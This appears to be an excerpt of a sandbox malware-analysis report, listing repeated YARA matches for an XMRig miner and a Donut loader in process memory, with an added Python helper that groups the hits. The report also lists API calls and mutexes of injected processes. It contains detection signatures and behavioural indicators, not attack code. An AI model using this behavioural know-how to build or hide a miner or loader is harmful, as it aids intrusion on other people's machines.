Source: 0000001D.00000003.1491167267.0000012BFEB12000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000001D.00000003.1504370851.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000001D.00000003.1510372978.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000001D.00000003.1485004069.0000012BFEB18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000001D.00000003.1493388447.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000001D.00000003.1515362432.0000012BFEB10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000001D.00000003.1500353828.0000012BFEB1F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000001D.00000003.1490294728.0000012BFEB18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000001D.00000003.1489451873.0000012BFEB13000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000001D.00000003.1492275711.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000001D.00000003.1480698288.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000001D.00000003.1514543598.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000000A.00000002.1356435328.0000000000A73000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000000A.00000002.1356435328.0000000000A73000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
Source: 0000001D.00000003.1483759497.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000014.00000002.1397583794.00000113DAF00000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000014.00000002.1397583794.00000113DAF00000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
Source: 0000001D.00000003.1507696835.0000012BFEB1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000001D.00000003.1473812913.0000012BFEB13000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000001E.00000002.1535066654.0000021E7B340000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000001E.00000002.1535066654.0000021E7B340000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
Source: 00000018.00000002.1422444536.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000018.00000002.1422444536.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
Source: 0000001B.00000002.1427320159.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000001B.00000002.1427320159.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
Source: 0000001D.00000003.1501988421.0000012BFEB12000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000001D.00000003.1482207840.0000012BFEB14000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000001D.00000003.1508918553.0000012BFEB16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000001D.00000003.1517174227.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000001D.00000003.1506306957.0000012BFEB16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000001D.00000003.1464746998.0000012BFEB10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: Process Memory Space: conhost.exe PID: 7536, type: MEMORYSTR Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
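The YARA listing above emits one line per memory dump, so the same rule repeats dozens of times and the useful detail is buried in the dump file name. Reading that name as `<process index>.<dump type>.<timestamp>.<base address>.<page protection>.<...>.sdmp` (an assumption about Joe Sandbox's naming, not stated on the page), the two Donut loader rules fire in regions whose protection field is 0x40 (PAGE_EXECUTE_READWRITE) for processes 0x14 and 0x1E, which is what injected shellcode looks like, while the Xmrig rule fires in 0x04 (PAGE_READWRITE) regions of process 0x1D and in the string dump of conhost.exe PID 7536. The Elastic rule that matched carries os = macos metadata, so treat it as an XMRig string match rather than a platform verdict; the report's separate "Yara detected Xmrig cryptocurrency miner" and "Detected Stratum mining protocol" signatures are the corroboration. The Python helper below is an added example, not part of the Joe Sandbox report, that parses these lines and groups hits per process with an executable-region flag; the dump-name layout is the assumption just described, and the five sample lines are copied verbatim from the listing above.

```python
"""Added example: triage helper for the Joe Sandbox YARA-match lines above.

Parses "Source: <dump>, type: MEMORY Matched rule: <rule> <key = value, ...>"
lines, decodes the dump file name into process index, base address and page
protection, and groups hits per process so an analyst can see which process
holds which payload and whether the matching region is executable.
"""
import re
from collections import defaultdict
from dataclasses import dataclass, field

# winnt.h page-protection values; any of the four execute bits means the
# region can run code (the Donut loader hits below sit in such regions).
PAGE_READWRITE = 0x04
PAGE_EXECUTE_READWRITE = 0x40
EXECUTE_MASK = 0x10 | 0x20 | 0x40 | 0x80

# Assumption (not stated on the page): Joe Sandbox dump names follow
# <procindex>.<dumptype>.<timestamp>.<baseaddr>.<protect>.<memtype>.<state>.<x>.sdmp
DUMP_RE = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\.\d+\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})"
    r"(?:\.[0-9A-Fa-f]{8}){3}\.sdmp$"
)
LINE_RE = re.compile(
    r"^Source:\s+(?P<source>.+?),\s+type:\s+(?P<type>\w+)\s+Matched rule:\s+"
    r"(?P<rule>\S+)\s*(?P<meta>.*)$"
)
# key = value pairs; a value runs up to the next ", key =" so that
# "scan_context = file, memory" is kept whole.
META_RE = re.compile(r"(\w+)\s*=\s*(.*?)(?=,\s*\w+\s*=|$)")
PID_RE = re.compile(r"^Process Memory Space:\s+(?P<image>\S+)\s+PID:\s+(?P<pid>\d+)$")


@dataclass
class Hit:
    process: str        # "process <index>" or "<image> PID <pid>"
    base: int           # base address of the dumped region (0 if unknown)
    protect: int        # page protection of the region (0 if unknown)
    rule: str
    meta: dict = field(default_factory=dict)


def is_executable(protect: int) -> bool:
    return bool(protect & EXECUTE_MASK)


def parse_hit(line: str):
    """Return a Hit for one 'Matched rule' line, or None for any other line."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    meta = {k: v.strip() for k, v in META_RE.findall(m["meta"])}
    src = m["source"]
    d = DUMP_RE.match(src)
    if d:
        return Hit(f"process {int(d['proc'], 16)}", int(d["base"], 16),
                   int(d["protect"], 16), m["rule"], meta)
    p = PID_RE.match(src)
    if p:
        return Hit(f"{p['image']} PID {p['pid']}", 0, 0, m["rule"], meta)
    return Hit(src, 0, 0, m["rule"], meta)


def summarize(lines):
    """Group hits: process -> rule -> {count, threat_name, executable}."""
    out = defaultdict(dict)
    for line in lines:
        h = parse_hit(line)
        if h is None:
            continue
        entry = out[h.process].setdefault(h.rule, {
            "count": 0, "threat_name": h.meta.get("threat_name", ""),
            "executable": False})
        entry["count"] += 1
        entry["executable"] = entry["executable"] or is_executable(h.protect)
    return dict(out)


# Five lines copied verbatim from the report section above.
SAMPLE_LINES = [
    "Source: 0000001D.00000003.1485004069.0000012BFEB18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25",
    "Source: 0000000A.00000002.1356435328.0000000000A73000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13",
    "Source: 00000014.00000002.1397583794.00000113DAF00000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13",
    "Source: 00000014.00000002.1397583794.00000113DAF00000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13",
    "Source: Process Memory Space: conhost.exe PID: 7536, type: MEMORYSTR Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25",
]

if __name__ == "__main__":
    for proc, rules in summarize(SAMPLE_LINES).items():
        for rule, info in rules.items():
            flag = "EXEC" if info["executable"] else "    "
            print(f"{flag} {proc:22} {info['count']}x {rule} ({info['threat_name']})")
```

Run over the full listing, the summary shows the Donut loader rules paired with an executable region only in the dumps whose protection field is 0x40; a hit in a read-write region is a copy of the loader's bytes, not necessarily the running instance, so the EXEC flag is the one to chase first when pulling dumps for further analysis.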
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.mine.winEXE@157/47@1/2
Source: C:\Windows\System32\dllhost.exe Code function: 94_2_0000000140002D4C OpenMutexW,Sleep,CloseHandle,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,RegQueryValueExW,RegQueryValueExW,RegCloseKey,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,ShellExecuteW,GetProcessHeap,HeapFree,SleepEx, 94_2_0000000140002D4C
Source: C:\Windows\System32\dllhost.exe Code function: 95_2_0000000140002D4C OpenMutexW,Sleep,CloseHandle,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,RegQueryValueExW,RegQueryValueExW,RegCloseKey,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,ShellExecuteW,GetProcessHeap,HeapFree,Sleep, 95_2_0000000140002D4C
Source: C:\Windows\System32\dllhost.exe Code function: 97_2_0000000140002D4C OpenMutexW,Sleep,CloseHandle,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,RegQueryValueExW,RegQueryValueExW,RegCloseKey,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,ShellExecuteW,GetProcessHeap,HeapFree,Sleep, 97_2_0000000140002D4C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 56_2_004011AD SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,CoUninitialize,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString, 56_2_004011AD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 56_2_004017A5 FindResourceA,SizeofResource,LoadResource,LockResource,RegOpenKeyExW,RegSetValueExW, 56_2_004017A5
Source: C:\Users\user\Desktop\e7WMhx18XN.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\e7WMhx18XN.exe.log
Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6140
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:2712:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:5304:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\Onimai_3637bd27-1800-4db6-94b5-e49ce9967b2d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3104:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7308:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5916:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7072:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3192:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:3128:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3480:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6168:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6320:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2660:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6580:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4696:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6616:120:WilError_03
